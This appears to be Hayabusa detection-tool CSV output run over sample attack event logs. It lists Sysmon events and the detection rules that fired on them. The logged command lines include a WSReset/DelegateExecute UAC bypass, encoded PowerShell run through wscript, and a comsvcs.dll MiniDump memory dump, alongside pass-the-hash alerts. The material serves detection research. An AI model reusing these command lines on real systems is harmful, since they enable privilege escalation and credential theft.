2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3b3 | PID: 4544 | PGUID: 747F3D96-A686-5D46-0000-0010EA77D703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:34:00.871 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 18:34:01.014 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx
2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 56 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\system32\reg.exe | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.609 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3fb | PID: 200 | PGUID: 747F3D96-B07F-5D46-0000-001050C80F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 312 000002806444CB40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3952 | PGUID: 747F3D96-B07F-5D46-0000-0010C1CB0F04,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3b3 | PID: 2112 | PGUID: 747F3D96-B080-5D46-0000-0010D4EA0F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass WSReset,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WSReset.exe"" | LID: 0x18d3b3 | PID: 820 | PGUID: 747F3D96-B091-5D46-0000-001081F71104",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Wsreset UAC Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via WSReset.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | LID: 0x18d3b3 | PID: 7792 | PGUID: 747F3D96-B092-5D46-0000-001089041204",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.441 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.643 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: {4ED3A719-CEA8-4BD9-910D-E252F997AFC2} | Process: C:\Windows\system32\reg.exe | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-04 19:16:55.712 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx
2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x38f87e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx
2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 1052 | PGUID: 747F3D96-F639-5D53-0000-001067DA2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x29126 | PID: 6000 | PGUID: 747F3D96-F639-5D53-0000-001092EE2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0x29126 | PID: 8180 | PGUID: 747F3D96-F639-5D53-0000-0010B0FC2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx
2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 2476 | PGUID: 747F3D96-FBCA-5D53-0000-0010B8664100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | LID: 0x29126 | PID: 2876 | PGUID: 747F3D96-FBCA-5D53-0000-001036784100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx
2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx
2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript c:\ProgramData\memdump.vbs notepad.exe | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\cmd.exe | LID: 0xe81e5 | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,Exec,WScript or CScript Dropper,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00 | Hash: SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0xe81e5 | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.396 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\notepad.bin | Process: C:\Windows\system32\rundll32.exe | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-08-30 21:54:08.439 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,CredAccess - Memdump | Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2888 | Src PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00 | Tgt PID: 4868 | Tgt PGUID: 747F3D96-1C5C-5D69-0000-0010FEB71E00,../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx
2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx
2019-09-01 21:04:22.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:445 (MSEDGEWIN10) | Dst: 10.0.2.17:59767 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx
2019-09-01 21:04:22.908 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:62733 (MSEDGEWIN10) | Dst: 10.0.2.17:445 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx
2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49947 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx
2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49947 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49948 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:04:58.463 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49948 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 2019-09-03 20:05:22.837 